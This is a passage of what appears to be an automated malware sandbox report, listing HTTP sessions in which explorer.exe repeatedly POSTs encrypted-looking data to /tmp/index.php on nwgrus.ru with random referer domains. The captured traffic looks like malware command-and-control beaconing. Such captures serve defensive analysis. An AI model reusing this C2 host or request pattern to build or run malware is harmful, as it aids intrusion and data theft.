                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449741189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:31.855186939 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://xnobteannnesvysc.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 343
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:31.855186939 CEST343OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5c 59 c6 f3
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu\Yx-]~lpZ"Ae,vUmZM~G?,:@K<~o=GNDYapX2%M519fdPV>k^j#:
                                                                            Oct 14, 2024 01:52:32.943216085 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:32 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449742189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:32.954488039 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://tapxxmacigntnnfe.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 360
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:32.954519987 CEST360OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 5e 59 a1 b6
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu^Y*sZF>N%-U9(?Obu!1bj_'Lla:QC|K`]*>6WARSMAy7_J9g7B9
                                                                            Oct 14, 2024 01:52:34.066059113 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:33 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.449743189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:34.075334072 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://vammwtwbjec.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 192
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:34.075371981 CEST192OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 53 1e c3 88
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuSa]=Ar)~p1Cw\jA;)t2S&eh-+v,n$Er5
                                                                            Oct 14, 2024 01:52:35.284312010 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:34 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.449744189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:35.292782068 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://akhsodkspgrml.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 361
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:35.292782068 CEST361OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 49 15 fd 88
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuIE^ar#nK]o:@KaJ.lW\B"\"O8snY["1F"R\+;@\ BBEzCe&OQM`
                                                                            Oct 14, 2024 01:52:36.394654036 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:36 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.449745189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:36.408469915 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://tsjfluqkxyqldltv.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 283
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:36.408479929 CEST283OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2b 2b c6 f5
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu++mXiFd`?IYB M{ezc@[<*}+tT"q8BG%+Sg_>>%g}tL|p33
                                                                            Oct 14, 2024 01:52:37.513359070 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:37 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.449746189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:37.522823095 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://xiohrwbimqciogt.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 310
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:37.522850037 CEST310OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 76 39 bf b9
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuv9H`_}tk`+eKpmZ;>Q0&&XWWB7/ >}Pv.X'b/)Nj/l
                                                                            Oct 14, 2024 01:52:38.610548973 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:38 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.449747189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:38.624982119 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://omlvjsbjwgbtt.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 261
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:38.624982119 CEST261OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4f 31 da 96
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuO1qW`CDs QrV~ZyUKFU.?uH=[]e3`-?n7G`;{APhN/cj0`tXh-
                                                                            Oct 14, 2024 01:52:39.978420019 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:39 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                            Oct 14, 2024 01:52:39.978519917 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:39 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.449748189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:40.123960972 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://vsbjnemdwavwq.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 325
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:40.124027014 CEST325OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 40 3e a3 88
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu@>,xw0`:VC-t/gR\^04<$K=xk _{KtU@S'C3ENnSvN|ae@\
                                                                            Oct 14, 2024 01:52:41.223464966 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:41 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.449749189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:41.237576008 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://lothfyrshwumy.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 216
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:41.237576008 CEST216OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 42 5e ab a8
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuB^r>Dj>[[v6.hRlSl2H70U]+xw>O;-D< <xB\C2rD{@
                                                                            Oct 14, 2024 01:52:42.343538046 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:42 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.449750189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
